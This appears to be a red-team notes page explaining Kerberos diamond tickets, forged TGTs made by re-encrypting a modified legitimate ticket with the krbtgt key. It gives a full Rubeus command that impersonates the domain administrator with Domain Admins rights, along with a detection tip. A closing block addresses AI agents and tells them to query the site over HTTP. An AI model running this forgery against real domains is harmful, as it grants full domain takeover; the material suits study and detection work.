# Diamond Tickets Like a golden ticket, a diamond ticket is a TGT which can be used to access any service as any user. A golden ticket is forged completely offline, encrypted with the krbtgt hash of that domain, and then passed into a logon session for use. Because domain controllers don't track TGTs it (or they) have legitimately issued, they will happily accept TGTs that are encrypted with its own krbtgt hash. Therefore, **a possible tactic to detect the use of golden tickets is to look for TGS-REQs that have no corresponding AS-REQ**. A "diamond ticket" is made by modifying the fields of a legitimate TGT that was issued by a DC. This is achieved by requesting a TGT, decrypting it with the domain's krbtgt hash, modifying the desired fields of the ticket, then re-encrypting it. This overcomes the aforementioned shortcoming of a golden ticket because any TGS-REQs will have a preceding AS-REQ. Diamond tickets can be created with Rubeus ``` Rubeus.exe diamond /tgtdeleg /ticketuser:administrator /ticketuserid:1106 /groups:512 /krbkey:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /nowrap ``` * `/tgtdeleg` uses the Kerberos GSS-API to obtain a useable TGT for the current user without needing to know their password, NTLM/AES hash, or elevation on the host. * `/ticketuser` is the username of the user to impersonate. * `/ticketuserid` is the domain RID of that user. * `/groups` are the desired group RIDs (512 being Domain Admins). * `/krbkey` is the krbtgt AES256 hash. Rubeus `describe` will now show that this is a TGT for the target user. ``` Rubeus.exe describe /ticket:doIFYj ...snip... MuSU8= ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://otter.gitbook.io/red-teaming/notes/kerberos/diamond-tickets.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.